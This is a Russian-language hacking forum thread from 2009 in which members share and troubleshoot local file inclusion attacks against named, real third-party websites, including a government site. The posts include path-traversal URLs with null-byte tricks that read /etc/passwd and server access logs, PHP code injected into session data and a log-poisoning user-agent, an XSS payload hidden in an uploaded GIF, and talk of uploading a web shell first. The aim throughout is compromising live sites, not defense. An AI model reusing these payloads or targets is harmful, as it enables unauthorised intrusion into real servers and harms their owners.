HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.06.2009, 16:38
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

дефейсы и их обсуждения на ачате запрещено.
 
Ответить с цитированием

  #2  
Старый 29.06.2009, 00:32
DeepXhadow
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695

Репутация: 19
По умолчанию

Несколько страниц был спор об этом инклуде...у меня вопрос остался

Делаю такой запрос:

Цитата:
http://www.cyl.ru/index.php?lang=ru&page=order2&fcountry=<? system($cmd); ?>
Потом читаю
Цитата:
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_adda%00
Выдает

Цитата:
cyl_price_rub|i:4880;cyl_price_dollar|i:148;order_ id|N;country|s:19:"<? system($cmd); ?>";countryname|s:6:"Россия";city|N;oplata|N;o plata_price|N;name|N;zip|N;cityname|N;address|N;me tro|N;phone|N;calltime|N;email|N;info|N;the_curren t_page|s:6:"order2";the_previous_page|s:6:"order2" ;the_partner|N;user_id|i:181944214;
Полему при LFI не исполнился php код? Что я сделал не так?
 
Ответить с цитированием

  #3  
Старый 29.06.2009, 00:47
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от DeepXhadow  
Несколько страниц был спор об этом инклуде...у меня вопрос остался

Полему при LFI не исполнился php код? Что я сделал не так?
ОМГ !!! ОМФГ!!!

Несколько страниц было объяснение одному господину, теперь второму нужно объяснить?

Я помоему тебе сразу ответил.

Это не инклуд там file()
вот мой пост:
https://forum.antichat.ru/showpost.php?p=1327108&postcount=7572

А если у кого-то там инклуд, пиши ему в ПМ, и пусть он тебе сам объясняет почему код не исполняется
 
Ответить с цитированием

  #4  
Старый 29.06.2009, 09:28
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Помогите пожлауйста найти httpd.conf на этом инклуде

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
 
Ответить с цитированием

  #5  
Старый 29.06.2009, 09:52
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
По умолчанию

Цитата:
Сообщение от nub-hacker  
Помогите пожлауйста найти httpd.conf на этом инклуде

http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
Код:
http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...
 
Ответить с цитированием

  #6  
Старый 29.06.2009, 10:00
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Цитата:
Сообщение от DimOnOID  
Код:
http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
217.26.52.37 отсюда логирует...

спс, поставте ему +5.

ЗЫ плиз, не лейте шелл до меня, пожалуйста =)
 
Ответить с цитированием

  #7  
Старый 29.06.2009, 11:23
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Ещё вопрос.
http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../var/log/httpd-access.log

вот лог. Что надо вписаь в инеткряк чтобы оставить запись в этом или еррор логе

=================
Вот ещё:

http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../var/log/httpd-access.log

но мне опять не везёт. php код не выполняется =(

вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"

Последний раз редактировалось nub-hacker; 29.06.2009 в 11:59..
 
Ответить с цитированием

  #8  
Старый 29.06.2009, 12:13
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от nub-hacker  
но мне опять не везёт. php код не выполняется =(

вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=это%20не%20инкл уд

Warning: fopen(articles/это не инклуд):
 
Ответить с цитированием

  #9  
Старый 29.06.2009, 12:15
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

PHP код:
function CheckExt($filename$ext)
{
    
$name strtolower($filename);
    if(
substr($namestrlen($name) -33) == $ext)
        return 
true;
    else
        return 
false;

Этот скрипт уязвим?(он проверяет расш. файла при заливке) Вот что я пытался сделать...
Поскоку скрипт проверяет токо название файла (что за расширение стоит в конце) то я попробывал залить gif а в гифе в конце файла (после ";" (без ковычек)) подставить это

PHP код:
<html><script>alert(//)</script></html> 
Подставил... Зашел через IE(картинка битая была при просмотре), в итоге алерта нету! В чем дело?
 
Ответить с цитированием

  #10  
Старый 29.06.2009, 12:25
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
По умолчанию

Спс, jokester. А есть ли скрипт который сам проверят на дефолтные пути к конфигам и логам? в одной теме где дефолтные пути там есть атач от Elekt. Но архив битый, не открывается. Может гдето ещё есть?

ЗЫ можно в дальнеёшем просто joker?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.